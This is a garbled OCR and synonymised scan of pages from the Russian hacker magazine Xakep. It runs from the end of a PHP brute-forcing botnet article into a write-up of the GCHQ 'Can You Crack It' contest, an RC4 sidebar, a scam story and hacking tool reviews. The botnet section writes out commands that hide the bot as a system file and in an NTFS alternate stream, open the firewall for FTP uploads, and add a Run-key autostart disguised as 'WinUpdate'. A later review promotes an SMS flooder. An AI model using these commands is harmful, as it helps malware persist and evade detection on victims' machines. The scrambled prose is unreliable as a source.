сего выполняется пересмотр IР-адресов во базе [можно присвоить специальный идентификатор каждой машине, каковой симпатия короче

ХАКЕРСКИЕ ФИЧИ Теперь перейдем ко оптимизации нашего самопального комплекса .

делегировать всякий раз, в надежде разобрать посреди собою ха сты,

Во-первых , брутер, лодка равно библиотеку не запрещается запаковать на нераздельно

находящиеся из-за NAT), в дальнейшем а во базу добавляются те адреса,

экзешник, вдобавок так, ась? ход функционирования бота способен

которые отнюдь не были на ней найдены. Их дозволительно судить на панели

невидимым, ведь глотать рента отнюдь не бросьте видно.

управления ботами. Но в оный случай, разве лодка еще брутит равным образом немо­

Для сего дозволительно nрибегнуть для подручным средствам, а то-то и есть

жет отстучать, сколько спирт живой, позволительно да проделать во таблице

со от тавить блузка следующего содержания:

графа

нужно вместе с бросать софтин ко у ВАТ То ЕХЕ Conveгteг

lastcallback . Там

отображается число, которое указывает,

%CD%\bot.exe. Далее 1.5 равным образом скомпилировать

в отдельных случаях кавасаки отстучал во nоследний раз. Таким образом, близ каждом

на ней нынешний батник, промежуточно указав во настройках invisiЫe

обращении для серверу зто вес обновляется.

application равным образом выбрав держи вкладке include три файла: bot .exe, теку [php5ts.dll) равно самолично консольный брутер [md5.exe).

Если оно лишше 000 [дефолтный пятиминутный интервал отстукивания бота), в таком случае сие значит, зачем ботик работает иначе находится

библио­

Программка создаст нераздельно файл, гегемонящий во фоновом режи­

во офлайне. Затем нужно сформировать релаксатор конфигов. Конфиг, на правах

ме . Затем не возбраняется свершить так, дай тебе скрывались да самочки файлы . Для

ты, возможно, заметил объединение вышеприведенным кускам кода, состо­

сего поглощать ряд способов. Вотан изо них- это, например, про­

ит с двух частей, объединенных наслышан

0.

стое контрафакция штатной виндавай софтины attгib от флагами

Первая порция отвечает вслед за команду, которую nолучает бота,

'+h ' равно '+s'. При мер:

а вторая- вслед за дополнительные данные, нужные интересах исnолнения

этой команды. Чтобы принести команду сверху установку, автор должны

attrib "%CD%\bot.exe" +h +s

отослать кое-что слыхать iпstalllvocab_123123123.txt, идеже iпstall­ этo директива установки бота, а

vocab_123123123 .txt-

сие обложка

словаря, каковой нужно установить. Мы как и можем подскрести по сию пору

Такая первенство скроет равным образом сделает системным отечественный обложка бота. Спрятать обложка на потоках

NTFS

капельку сложнее:

работники файлы, попросту удалив их,- про сего порядочно по­ слать команду

clean.

Ну равно самая главная команда- сие bгute.

Второй параметр этой команды объединяет хеш да на б рута

cd "%systemroot%\system32 type packed_bot.exe>calc.exe:bet.exe

со через двоеточия:

Запуск подле этом осуществляется равным образом из через батника: brute)c4ca4238aeb92382edccse9aбf75849b: c81e728d9d4c2fб3бfeб7f89cc14862c:eccbc87e4b5ce2fe28Зe8f

d9f2a7baf3 Все результаты заливаются в ПР-сервер, тот или другой находится там же, идеже равно середка управления . Попадает всё сие труд во папку

cd "%systemroot%\system32 start .\calc.exe:bet.exe Наш обложка на томище числе загружает результаты получи и распишись FТР. Файервол

Windows

может получи сие спорить , следственно попробуем его обойти:

гesults. Для того дабы подложить во базу готовые результаты, ботик <<дер­

гает» скрипт от передачей параметра

iamfinished.

С криnт сервера

passthru( 'netsh firewall add allowedprogram %WINDIR%\ system32\ftp.exe TCPinfrastructure>nul 0>&1 ' ); Авторан ради нашего ехе [если дьявол лежит, например, в % systemгoot % ):

passthru( 'reg add HKLM\software\microsoft\windows\ currentversion\run /v WinUpdate /t REG_SZ /d %WINDIR%\packed_bot.exe /f>nul 0>&1' ); ЗАКЛЮЧЕНИЕ В РНР масса функций, предназначенных с целью создания нехи­ лого файлового менеджера либо — либо но простого системного помощника . Я надеюсь, в чем дело? по причине моей статье твоя милость убедился малограмотный только в этом, а тоже да на том, зачем в целях автоматизации процесса суще­

ствует много различных средств , которые возле совместном

Рабочий лодка

ХАКЕР

03/158/20 02

использовании могут очень тебе помочь.::;:

065


plaintext lfi rst!a plaintext.su, http://www.plaintext.sul ·

can cra 8t' 1• РЕШЕНИЕ ЗАДАНИЙ ДЛЯ ХАК-КОНКУРСА, УЧРЕЖДЕННОГО

УПРАВЛЕНИЕМ

ПРАВИТЕЛЬСТВЕННОЙСВЯЗИ ВЕЛИКОБРИТАНИИ

Недавно Управление правительственной взаимоотношения

Великобритании объявило жалкий

Н-конкурс, ради запутать ко себя внимание к а ко для работодателю . Не уверен, что-нибудь для ним кто­ то устроился получай работу, однако пройт да задания изо

На нашем диске ты смож ешь найти видео из полным прохождением

конкурса « Сап

You

Cr ack lt?».

спортивного интереса мамой клянусь захотели многие .

.PNG .......IHDR. .............j .-•... sRGB ......... pHYs ................. tiME. .. .. . 0-9.p ... )iТXtComment ..... QkJCQjiAAACR2PFtcCAбq2eaCBSR+BdmD/zNzLQC+td3tFQ4q x8044 7ТDeuZwSP+{)SsDEcYR.78J KLW=2 ...... IDATx ... yt .... лcwuW... So-.. ,....... L.. l!!> ... q .. 08.. 0.. a.7.,. НV.y.&.:. G.a ...... mMH.d ......\ .U... ?.n7-Ktuwi ... Gj.R. ..... g.} .. .. sн. д .... sн . д.... sн . д .... sн . д .... sн . д .... sн . д.... sн . д .... sн. д.... sн. д .. .

.sн . д.... sн . д. ... sн . д.... sн . д.... sн . д .... sн . д. ........o.. u.... на :. Lz . D .. I!!>.B c.... .l.4.. ) .... • -....... d .. !QZ. •-ее. D, .. ,.. q.R.fc.. & .•w41r... Ra6... 0...:... ".. } .D.r..https://issuu.com/14.% ....... D<. D " s .i A.ТX, .. ZD .... $....... лX. .. 0.. ·.C.9y.i ...V... ,MO.. G.B y .... B .......... (<.C.. q .. X.Di .. 0M .....f{... Sv; .. (... 0.H.&'.}}y.j....... 0.. BQ.. !. .... zz.... t..jM&...... К. .. s% .... f .. nW.... X.fH .... s.. k .. h.vmm-' .._y: :.' p.6... djSK ............. R. .. R.. 0. Q.... >..... <....... bH ...... C.1 ... t) . .........-.UX,.%K11!> ..

Задани е первого этапа

066

Комментарий ко файлу вместе с заданием

ХАКЕР

03/158/2012


0

Итак, некоторое минута отступать Управление

ячейка конца отечественный е го кода, указываю щишки й, идеже

void

правительовенной рычаги Великобритании

со держит ся значе ни е ОхАААААААА. Д алее

{

об ъявило конкурс, успешное относительно хож д ение

с стека изо влека ется

DWORO,

нивается не без; ОхАААААААА. Затем извлекается

свое резюме, а впоследствии равно уйти получи и распишись работу

е ще относительно дн что до з начени е, ко тор ое срав нив ае т ся

во брита н скую киберразве д ку . Пр едложе нны е

от О х ВВВВВВВВ . Однако сего куска дан ных

после дания н е приблизительно ужак сложны, д а да саму стра­

!второй половины стека функции] у нас нет.

ницу отдела к~дров Управления правитель­

функции , необ хо партия в рассуждении поберечь кресловина тин ку со за­

одновременно обнаружи ть близ п омо суп пои сков да ко а

дани е м из овраг та равным образом п осмо третья часть , в качестве кого сия деятельность

Google,

но настоящий соперничество всё а интере­

сен , круглым счетом что дьявол позволяет просчитать у ровень

перед г отовки сотрудников, ко т орые соста вля­ ли задания.

На странице ко нк урса, находящейся до

iTXt РNG-файла вместе с из-за ­ данием ! ко диров ка UTF-8]. Бинарные д анные закодированы не без; п омо щью алгоритма Base64 и следуют вслед сло на ом Comment !смотри рисунок].

}

Раскодировав равно склеив дв а бинарника, моя персона за­

v1 v2 do

ния, какой представляет собою следующую

ствующий рисунок] да надпись-дразнилку «Сап

строку:

Сгасk

lt?>>.

l~hile

первоначально подумал, который сие из-за шифрованное по­

GET

/ 05b43бde1f9187f3778aad525e5d8b28 .js

ASCII,

всё-таки у меня

околесица безвыгодный вышло. В итоге ваш покорный слуга решил вставить совершенно

НЕХ-значения вместе с рисунка во бинарный фай л и открыть полученное распущенность на

IDA

Рг что касается . В

После ото п равки соот во е т ствующе г об

GET-

зanpoca н а сервер получаем на втором месте после дан ие.

Кстати, ко д дозволено запус тить нескольки­ ми со п особами. Я создал аляповатый ехе -фа йл, в котором первоначально считывается отрезок стих от

таты.

ради ей-ей нием, а испарина ом всё э т насчёт д ело запускается для

распознал осмысленные куски

стих чтобы архитектуры х86 . Я п в отношении нял , ч т по отношению выбрал

совершение ! п од ко н тро л ем

верный п у ть.

безыскусственный ассемблерной вставки:

IDA] быть правая рука ощ равно

OxDEADBEEFu; +

v1 ;

( (_BYTE ) vO ) ; sub_39 (); } Результат декомпиляции

нием. Д ля сего малограмотный нужно узнавать микроформат

PNG,

а порядочно легко оказываться внимательным !не­

Недолго думая , ваш покорный слуга преобразовал настил уче н­ ный ломоть стих на функцию да запустил д еком­

=

l~hile

итоге ми посчастливилось секс воспитывать кое-какие рез ул ь­

IDA несложно

( (_BYTE ) vO ); о;

}

НТТР / 0 . 0

мости каждого зна чения равно попытался дальше

перекинуть их на символы

0;

LOBYTE ( v1 )=v2 + v4[ v0 ] v2=ROR __ ( v2 , 0); v3=v4[ v1 ]; v4 [ v1 ]=v4[ v0]; v4[ vO ]=vз ; lOBYTE ( vO )=vO + 0;

Уви д е во сии Н ЕХ-значения, ваш покорнейший слуга

слание, начал было делать расчёт частоту встречае­

+

{

пустил адрес держи проведение в жизнь !под отладчиком] и пр осмотрел рез ультат пр по отношению ц е д уры дешифрова­

You

v4[ v0 ]=vO ; lOBYTE ( vO )=vO

усик тро е в . Недостающие д анные со держатся во

из набором НЕ Х - з начений !смотри соответ­

о;

{

дополнительной секции

адресу caпyou cг ackit . co . uk , да мы не без; тобой видим картинку

cdecl sub_O()

vo do

Чтобы выкопать вторую половин у стека нашей

овенной рычаги IGCHQJ позволительно пр акти ч ески

itl

int vo ; // есх@1 int v1 ; // еах@З unsigned int v2 ; // еdх@З char vз ; // bh@4 char v4[256] ; // [sp+Oh] [bp-100h]@2

который-нибудь срав­

которого п холм воляло отослать на У царствие

из ап сгасk

обходима ваш покорный слуга рэнкинг со держится во самом

начале файла].

_ asm

пилятор. Сначала во стеке вам деля ется место под конгломерат на

056

байт, некоторый заполняется

значениями с О по

055,

а дале е вып что до лняется

проце д у ра преобразования массива, которая

int 0;

mov call

SECOND STEP

nрограммная знак останова

еах,

еах;

array; ar ray -

скопление

не без;

кодом

заnус для для песня получи и распишись выnол нение

узнать на своем опыте обоссать эмулятор микро­ nроцессора . Дан обрубок памяти от кодом равно

получай са мом д шель-шевель пре д со т авляет внешне алгорифм

инициализации шифра RC4 со ра зме пунш блока 8 двоичный знак равным образом для люч ом OxD EADBEEF !смотри рисунок] .

Во втором задании а вт оры предлагают нам

данными, а в свой черед описана конфигурация

Хочу отме т ить, который на начале заключение прои схо ­

микропроцессора, про которого вс ё сие

После только сего вызывается до сей времени одна функ­

дит jmp при помощи цифра !вроде бы] неиспользуе­

предназначено . Процес отбросы состоит с

ция, плеть которой испорчен, равным образом поэтом у что до н а безвыгодный

мых байта. Э ти цифра байта пр гнет дя тся нам на

в области зубам декомпилятору.

дальн ейшем. Как видишь, на певом месте вопрос до­

восьми регистров, цифра изо которых !гО ... гЗ] представляют внешне регистры общего на­

свободно оборона со тое. Затруднения возникли только что

значения, неудовлетворительно предназначены чтобы хра нения

Как оказалось, на начале дальнейший функ­ ции значительность регистра

esp,

содержащего

указа тель для вершину стека, меняется держи

возле об нар еще нии следующий части со тека функции

адреса сегме нта заключение равным образом а др еса сегмента

во дополнительной секции РNG -файла вместе с зада-

данны х ics равно ds соо тв е т ственно], в отношении д ан ре-

printf ( ''\nkeygen .•xe\n\n'' ); if ( ~1 •• 0 ) (

uS • ( FILE • ) f ope n6 0("'license.txt" . ''r" );

if ( us ) ( MI?IIISet (&U9 0

D.

UNIX CRYPT()

0Jш);

fsc.:.nf ( uS . '"ts'' • r.u9 ); f c lose ( uS ); if ( u9 •• ' qhcg' )

Функция сгурt во операционных системах

{

u2 • crypt (); if ( ! s tr c ~tp ~ ( const char· • ) u2 . ghDTK7b8Kru w) ) U13 • 0;

printf ( "loading stage1 license key(s) .. . \n''); u6 • u10 ;

printf ( "loading stage2 license key( s ) . . . \n\n'' ); u7 • u11 ; u8 • u1 0 ; }

if ( U13 ) (

u4 • Tr ans•itl nfo (•(_DWORD

• )( а2

• lt). ( int )&u 0 );

}

else {

pri ntf ( ''er-ror: licf'nse.txt i nualid\n''); u4 • - 0;

*ni x

извлеченный объединение шифрованного текста вновь

DES

служит с целью хеширования различных данных,

шифруется вместе с через алгоритма

на томище числе паралей пользователей системы.

Таким образом , узел с восьми нулевых байт

равным образом т. д.

Традиционная сбыт этой функции

шифруется на nроцессеработы

использует заокеанский алгорифм

отметить, в чем дело? сгурt неграмотный использует стандартную,

DES (Data

05

присест . Стоит

Encгyptioп Staпdaгd]. Пароль пользователя

эталонную реализацию алгоритма

сокращается предварительно восьми символов, с каждого

Алгоритм и оный и другой раз в год по обещанию несколько меняется . Его

с которых, во свою очередь, берется

конкретная сбыт зависит ото соли длиной

0 бит. 7 двоичная единица информации формируют 06-битный DES, близ помощи которого

DES.

Восемь наборов сообразно

02

отпирка алгоритма

nреобразуются во строку около помощи алгоритма

шифруется устройство с восьми нулевых байт . Затем

бит. Соль да шифрованный шрифт во итоге

Base64.

Основной функционал программы keygen

ХАКЕР

03 / 058/ 0012

067


хакинг

short loc_6

-------------; :=====-=-=-=-:..::;- ----------------------------·

-------------

dd OAЗBFC2AFh

-

0

-----------------------------------·

loc_6:

; sub xor

сэ:

ОхОО ,

dэ:

OxlO ,

fl :

ОхОО ,

j tirmware:

esp,

000h

есх,

есх

СООЕ

XREF: sub_O!j

[ Oxd2aьlf05 , OxdalЭfllO ] So you did it- приветствие от успешным

Неиспользованные значения изо первого да второго заданий

гистр служит про хранения флага операции

[flgl, да один- в целях хранения адреса текущей инструкции [ipl. Микропроцессор обладает набором с

описании задания упоминается авиарегистр cs, так а во вкусе равно г51. Второй субаквальный камень -реализация fаг jump'oв равным образом изменения ip.

выполнением заданий

GET /da75370fe15c4148bd4ceec861fbdaa5.exe НТТР/1.0

Здесь не мудрствуя лукаво требуется знать, зачем значения ре­

восьми инструкций, каждая изо которых [за

гистров, отвечающих следовать гостиница сегментов,

Отсылая стоит на повестке дня GЕТ-запрос для сайту, полу­

исключением инструкции hlt, прекращаю­

изменяются только лишь быть дальних переходах равно

чаем сладкое после дани е - исполняемый файл. При

щей осуществление программыl имеет двушник

далеко не изменяются, кабы ip начинает называть

просмотре зависимостей сие го файла видно,

режима работы: mod О да mod 0. В принципе,

в новомодный секция стих . В остальном а всё

что-нибудь интересах его работы необходим Cygwiп. Вообще,

для того успешного выполнения задания до­

нетрудно да прозрачно. Разработчики заданий

во свойствах полученной программы указано,

статочно являться носителем небольшими навыками

предлагают нам воплотить в жизнь эмулятор сверху

что такое? нынешнее прозвище зкзешника keygeп.exe, приближенно

программирования, а вдобавок представлять,

языке JavaScгipt, всё же возьми то, бросьте ли

зачем отважно переименовываем его.

в качестве кого рабо т ают микропроцессоры. Однако на

учтено выполненное задание, коллекция языка

процессе программирования автор наткнулся

программирования отнюдь не влияет. Я реализо­

сом- адрес коврижки неграмотный обфусцирован. При следовать пу­

В оный крата ещё раз никаких пр облем от ревер­

получай до некоторой степени подводных камней. Сперва ваш покорнейший слуга

ворот эмулятор процессара в С. Программа

ске keygeп требует послать ему URL сайта ради

объединил во единственный конгломерат регистры общего

выполняется будет быстро, хотя бы у меня

соединения во качестве первого ровня метра. Ал­

назначения, а ради cs равным образом ds выделил отдель­

были подозрения, в чем дело? разработчики напи­

горитм работы программы довольно прост: во

ные переменные. Как оказалось, зто оши­

гаер код, тот или иной довольно сидеть получас :-1 .

текущей дир ектории выполняе т ся пои ск файла

бочный подход, в такой мере наравне во коде встречаются

инструкции как «add г[5], 02>>, которые, за

После остановки процессара [выполнения инструкции hltl на памяти появится родник ко

и три числа. Судя сообразно строкам на се гменте

замыслу разработчиков задания, изменяют

третьему этапу конкурса - текущий GЕТ­

данных, требуемые числа представляют из себя

значения сегментных регистров напрямую [в

запрос:

Stage оп е liceпce key да Stage two liceпce key,

licence .txt, с которого считывается строка, а

ВОССТАНОВЛЕНИЕ КРИПТОГРАФИЧЕСКИХ АЛГОРИТМОВ В сегодняшнее миг по-китайски отыскать

<<заnо дозрить >> оный не в таком случае — не то идентичный зона стих на

коммуникационную систему, которая никак не

nринадлежности ко какому-либо алгоритму .

ISBo x' ыl, иные специфические константы,

использовала бы криnтографию. Часто во

Так, например, современные симметричные

а как и такие nараметры алгоритма, на правах периметр

процессе реверс-инжиниринга различных

блочные алгоритмы шифрования как правило

ключей [в томик числе продолжительность массива раундовых

модулей необ х одимо признавать

построеныпоитерационной схеме, во которой,

ключей!, пикет блока, цифра итераций

равно восстанавливать используемые

наравне правило, производится изменение значений во

[раундов! равным образом т. д. Подобными признаками

криптографические алгоритмы, режимы их

соответствииснекоторой таблицей на памяти ,

вот и все обладают равно хеш -фун кции. Алгоритмы

работы, nорядок выработки да использования

нало жение ключа шифрования равным образом линейное

хеширования естественным путем исnользуют взрослые

ключей шифрования равным образом т. д. Разбор конкретной

перестройка . При этом на пределах одной

наборы констант, зачем облегчает признание

реализации алгоритма такженередко

функции на ассемблернам листинге может

подобно алгоритма равно его освежение .

позволяет невыгодный лишь только показать ее ошибки, да

попасться около руку цикл, большое часть

Стоит отметить, что-то на подавляющем

да оnределить, что такое? алгорифм исnользуется

инструкций тиnа

mov, movzx , add, хог, shl, shг

большинстве программных реализаций

неnравильно, на результате ась? могут

да т. д ., а в свою очередь частые обращения ко nамяти [в

симметричных алгоритмов шифрования

подниматься уязвимости, nозволяющие на

качестве nримера погодите рисунок!.

цель выработки массива раундовых ключей

конечном итоге nровести усnешную атаку получи

Кроме того, пользу кого каждого криптографического

lkey schedulel равно цель дешифрования/

систему на целом.

алгоритма дозволительно сделать акцент кое-кто

шифрования открытого текста находятся во

Вообще, универсального рецеnта по части

<< отличительные наружность >> , которые позволяют

разных участках стих программы . Это помогает

распознаванию криптографических

автоматизировать розыск необ х одимых

спуртовать nроцесс обработки информации (и

алгоритмов безвыгодный существует, дозволяется всего лишь

участков кода. Чаще токмо такими признаками

далеко не истрачивать всякий единожды эпоха да резервы возьми

сделать акцент есть такие nодходы равно оnисать

служат константы, х арактерные пользу кого того

nолучение

кое-кто nризнаки , которые позволяют

другими словами иного алгоритма. Для симметричных

алгоритма!.

068

алгоритмов сие могут бытийствовать блоки подстановак

key shedule

с основного ключа

ХАКЕР

03/158/ 0012


0са п cra ck it l

Ито г об на ый GЕТ-за пр ос для се р ве р у равно м еет

ведь кушать сие неко т об р ые д практически н ые, дл аз многогрешный n олучения

которых надлежит постановить следовать д ачи , п ре д ла­

вместе с л едую щ ий на равным образом д :

АЛГОРИТМ

гаемые в первом равным образом втором этапах конкурса.

Прочитанная изо файла стих nреобразуется

около nомощи функции crypt [из Cygwin ) равным образом срав­

RC4

GET / hqDT K 0 b8K2rvw/ A ЗBf C 0A F /D2 AB1F e5/ DA1 0F1 0e/key.txt НТ Т Р / 0. е Алгоритм

нивается от э т алон н ым з н а ч е н ием изо сегмен т а

данных программы. Д ойдя д насчёт э т ого буква n а, автор

Этот вопрос позволяет проюрдонить обложка

[также изве не без; тен равно как

ARC4)

нате

уже было nриня-лся рушить хеш с сегмента

key.txt,

данных, все э т об был тупиков ы й п уть, равно на сё

от п эскер д равлением

оказа л болт гораз д об n р в отношении щ е. Н еобхо д имый IР ­

сверху оп исание вакансии, во ко т в отношении р ом говорите т ся,

Ривесто м , одним изо основателей компании

местоположение из сего следует от использованием перво г относительно

в чем дело? конкурсанту, успешно выполнившему весь

R5A

nараметра программы [UR L сервера) равным образом DNS.

вслед д ания, абсолютно никак не предлагают работу лично

ладает рядо м прежде от тоинств , для которым на первую

Как неприхотливо д ога д аться,

UR L д олжен

п ред­

во котором указан источник через страни ц ы

RC4

сегодняшни й мол н ь является одним с самых

<<So you did it» да ссы л какой

известных да всеобъемлюще используемы х поточных

шифров. Алгоритм был разработан Раном 5ecu гi ty, на далеком

0987

году .

RC4

об­

сейчас, н что касается согласны разбирать его канди­

очер е дь относят из автор высокая прыть работы

став пят ь на вывеску а др нашел страницы не без; следовать безусловно ни ями:

ей-ей т у р у п озже, когд а на У п равлении п оявятся

равным образом п е ре м енная апофема ключа . На каждом такте

canyouc г ackme . co.uk . Д алее

свободные вакансии.

keygen.exe форми­

работы алгорит м генерирует

рует для удаленному серверу G ЕТ- задание вида:

SUMMARY GET /%s/%e8X/%e8X/%e8X/key .txt

НТТР / 0 .е

Как аз многогрешный уnоминал ранее, держи месте строки на за­

0 двоичный знак

псевдослу ­

ча йн в рассуждении й по части не без; ледовательно из ти да изменяет со вое вн у треннее от остояние , ко оторое определяется

З пекло анияотУправления п равительствен -

перестанов для ой значений с О поперед

утнапиштим маза Великобритании безвыгодный представля-

дву м пишущий эти строки однобайт н ыми там для сами:

055 [5) и i да j. Алго­

полуют казаться ой сложности равным образом во первую ряд

рит м

просе имеет смысл хеш-з н ачение изо сегмента данных .

ориентированы получай проверку смекалки, а поуже

инициализаци равным образом [К5А) равно алгоритма выработки

Остае т ся просто-напросто най т да значения <<ли ц ензионных

в дальнейшем - навыков реверс-инжинирин г а да про­

псевдослуча й хотя й последовательности . Про­

ключеЙ>> п ервого равным образом второ г в отношении э т апов из-за д аний,

граммирования равно знаний относительно принципах рабо т ы

цедура инициализации служит пользу кого выработ­

пользу кого почему автор начал набирать данные, которые

микропроцессоров. Выполнить сии задания лещадь

для равным образом п е р е становки

для сих этапах невыгодный использовались. На первом

силу любому человеку, у которого шабаш

через

этапе сие четверка байта во начале кода, от

терпения равным образом энтузиазма. Это неявно свиде­

псевдо для одом :

котор ы е ш ел п ер во в отношении н ачал ь н ы й

тельс т вует что касается том, ч в таком случае на

jump. Дл аз многогрешный

00

RC4

перед

состоит с дву х частей : процедуры

056

0

около помощи ко люча длиной

бит. К5А описывается не без; ледующим

GC HQ работают обычные

второ г что касается этапа сие нигде безвыгодный пригодившееся двушничек

гоминидэ ,

ОWОRО-значения firmware [смотри рисунок).

которые во зрелищных голливудских фильмах

Вообще, изумительный втором задании безвыгодный использовался

взламывают парали вслед за пару минут равно не без; легкостью

круглый беспристрастный ба н для памяти, кото ры й в ч равно н ае т ся

п ро н икают на следовать щ ищенные бредень правите ль со т а

j

со сигна т уры

разных стран. Н апоследок тянет побла г о­

f or i f r om е t o 055 j :=(j + S[ i ] + key[i mod keylength] ) mod 056 swap va lu es of S[i] and S[j] _ endfor

0z,

по отношению дн ако безграмотный автор вл яе т ся насчёт д ноимен­

everyday heroes, а

безвыгодный те супермены,

ным архивом. Этот учас т ок, никак не потребовавший­

бить челом кому чем британцев вслед единаче одну возмож н волос

ся чтобы выполнения задания, видимо , нужен

<<размяться» да проэкзаменовать домашние навыки . За д ания

прос т относительно д ля того, ч т обы после п ута т ь конкурса н так на .

наших спецслужб были бы слабо хар д ко рн ее. :х:

• •

.

• text :101221121 . text:10122112 .. • text: 000221126 • text :101221129 • text :1 ОО22А2С .text:100221133 • text: 0 00221136 • text :1 0022А38 • text: 0 00221138 • text: 0 002211ЗЕ • text: 0 012211..5 • text :1002211 ..7 • text: 0 002211..8 • text :1 01221152 • text :101221155 • text :100221157 • text :1 012211SA • text : 0 0122ASO • text :1 OI22ASF • text :100221162 • text :100221169 .text:10022116B • text :10022116Е .text : 000221171 .text:100221173 .text :100221176 • text :100221178 .text:10022117B • text: 00122117Е

ROU ROU

shr ROUZX ROUZX

Shl AOU

Shl" AOUZX ROUZX XOI" AOUZX AOUZX

Shl XOI" ROU

shl AOU

Shl" AOUZX XOI" XOI" AOU XOI"

esi. (eax• 0Ch ) есх. esi есх • 00h 0 edx. cl есх. ds:byte_10058188[edx) есх. 0 edx • esi edx. 0 edx. dl edx. ds:ьyte_10058188(edx] есх. edx edx. byte ptr (eax+ 0Ch ] edx. ds:ьyte_10058188[edx] есх. 0 есх. edx edi. (eax+ OCh ) есх. 0 edx. esi edx. 08h edx. ds:byte_100S8188(edx] есх. edx есх.

(еЬр+ О ]

edx.

(еах• 0 ]

есх.

(еах]

add

еьр.

0

XOI" ROU ROU XOI"

edx. есх (eax+ 00h ].

f or i f r om е to 055 S[ i] :=i endfor

:=

е

Алгоритм выработки псевдослучайной последовательности тоже полно прост .

Он описыва е тся следующим nсевдокодом :

i j

:=

е

:=

е

whil e GeneratingOutput: i :=( i + 0) mod 056 j :=(j + S[ i ] ) mod 056 swap valu es of S[i] апd S[jJ _ К :=S[(S[i] + S[j] ) mod 0;>6] output К endwh i l e Алгоритм

RC4

применяется с целью шифрования

данных на протоколе

05L, защиты трафика WEP, защиты документов Adobe PDF и Microsoft Office . Широко известны случаи,

на

когда-никогда неправильное исnользование данного

алгоритма позволяло вос от тановить конфи­

денциальную информацию . Так, некоторое время отворотти-поворотти с целью защиты содержимого

РDF-документов применялея ключа

есх

00

Х АКЕР

03/158/2012

AES

со длиной

ленник был в состоянии нахватать теледоступ ко содержимому

есх.

(еах• 0 ]

файла простым перебором ключа . В одной

есх.

edx

изо версий М5

Office RC4

исnользования Кусо ко ассе м блерного листин г а алгоритма

RC4

бит, во результате что-что злоумыш ­

ради неправильного для защиты файлов про

умереть и никак не встать из становления равным образом х содержимого х ватало

069


,.,~,.

(

~ '"r;- -,'

::,

~\ "~,.'

~.:~~~~

* :

r

• ~:---~

об

03

00000004 Ноемо бозо .-.кoe.rndЬ Количеста по части кееа.:

Оwт

09

Услоои• обробо""' r:t>

02

ДоnусТW<ЫА"'""""'fМ

0


с~ ... ~~ ~ сосорост-.

0898K8i5

Ф,,".,

0021 04

Mys..o

~

020~1

0•

022988

ТВ

0-4е<IОЭ

....

tфт

0~0

приема у квалифицированного специалиста.

Поиск соответственно базе:

+

с==_

сыскивать

Вы nоnали для самый немалый файловый искатель во рунете . Ищите любые файлы да скачивайте держи неограниченной скорости с самых больших торрент-трекеров

Попупярные требования :

сайт << Проверка зрения помощью интернет». Он, естественно, был жуть важнецки

IV сауз роща кот интерны wow аватар кас пере маз патч 0010 GTA Starcraft 0 рок ПрОГраММЫ dVd 0QQ9IOSSieSS ИЛаЯ ре nорно КОМеДИЯ mpЗ sasha grey музыка бесплатно

ссылку, которую выплюнул поисковик, и-

что до чудо'- сие оказалось вот поэтому и есть то, в чем дело? нужно:

''

кв н friends Fleur lost Dragon дgе crysis прожекrор перис хилтон шабаш

Конечно, Ваня испугался, а у страха, во вкусе из­ вестно, тараньки велики. Ваня ткнул первую но

daemon total

pdf медсанчасть фильмы HQ пипец windows 0 HD 020р от бросать dvdrip качество Весёлая ранчо house КаМеДИ

оформлен и, что-то самое главное, предлагал проверить прицел ранее сейчас' Ваня быстро нажал «Пройти проверку» да ответил нате во­ просы анкеты, которые слышно должны были выявить, почто а всё-таки произошло со его

глазами. Когда Ваня ответил возьми до этого времени вопросы, сайт сообщил ему, который помещение диагноза, вообще-то, платная, же овчинка выделки стоит дешевле пареной репы да в чем дело?

Ложный

072

depo si tfiles

чтобы его получения никуда не денешься включить личный

ХАКЕР

03/158/2012


Доброго времени суток уважаемые форумчанеl Предлагаю учреждение adult платников . в услугу входит : -Установка отметина платникiJ

Целевой сайт

-Настройка категорий -Нарнсовка уникального Лога -Наполнение

-nотключенне ко бнллннrу

А ТliКЖе просмотр до каталоrlllм©''


хакинг

Marlicq 084888, http://snipper.rul ·

СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ

Автор :

NEOx. URL:

Rro_r_,._,..,..НIIP

"' or тat> •

о'> е

..

Ьit .ly/x 0Lk8n.

--

._ ......

РЕ

Tools- сие

из

Q

~ ---~

Система :

полнофункциональная утили-

[64bitl. Она

Автор :

famatech. URL: radmin.ru/products/

SuicideiVII] . URL: rOOt .in/showthread . php?t=18056.

0pscanner.

Windows .

та к работы со файлами РЕ /Р Е +

Автор :

Система:

Система :

Windows.

Windows.

Е сли т ы когд а -либо использовал на своей соответственно ­

П ро га представляет с лица оборона д винутый SМS­

вседне во утнапиштим работе

флуд ер, позво л яющий распространять сведения

Radmin,

в таком случае советую тебе

содержит на себя следующие мо дули : вычитчик

попробо во ать на деле сызнова одну программу по отношению т тех

не без; любым текстом . Д лина касательно д ного СМС стандар­

РЕ- файлов,

а авторов -

тна равным образом составляет почти

Task

Vieweг, оп т имизатор

Win32

Advanced

0

Р Scanne г. Как яс н что касается

05

этим на олов нате кирил­

Р Е -файлов, д етек т гвалт компи л ваш покорнейший слуга т ора/у п аковщика

с названия, п ро га n редставляе т внешне п р по части ­

лице равно

да м н огое другое. Ос н овн ы е возмож н ости про­

дв инутый сетный сканнер .

живается отп ра вка С М С на т акие страны, вроде

г раммы попросту п оражаю т на оображе ни е.

Функционал равным образом основные добродетели тулзы:

Р оссия, Казахста н , Узбек да из т а н , Украина. Дл автор

0.

работы флудера т ребуются ва ли д ные аккаунты

образование дампов п роцессов [Full, Pa г tial,

вляе т многопоточное сканиро на а н ие со т ен

Maii. Ru.

Regionl;

килоом п ьютеров во сети, дабы отыскать такие ре ­

таких аккаунтов. Ты на п ол н е сможешь отыскать

сурсы, наравне общие папки, Н ТТ Р, НТТ РS равным образом FТР,

раздачи из ними, заре г истриро на ать аккаунты

да получитьдоступ ко ним.

беспричинно другими словами но вос п ользоваться од­

Интеграция не без;

ним изо многих nубличных брутфорсеров сего

окончание работ ы процесса;

Radmin . Б лагодаря инте­ грации не без; Radmin, свой сканнер находит все маши н ы из заnущенным Radmin Sегvеги п насчёт ­

нагрузка для ц есса во РЕ E ditoг равно РЕ Sniffeг;

зволяет по времени пристроиться для ним на единовластно

атрибуция О ЕР.

возглас . Д ля сего получи и распишись компью т ере, от которого

mymegaemai l @mail .ru:passw l r u: pas s

0.

.NET CLR-npoцeccoв; Anti Dump

автоматическое освобождение защиты Pгotection;

0.

версия приорите т а процесса;

РЕ Sniffer:

осущес т вляется сканирование, впредь до л но н б ы т ь

оп ре д е л ен да е т равным образом п а для касательно мп шлам пишущий эти строки т ора/у п аков щ ика;

рот н ов л е н

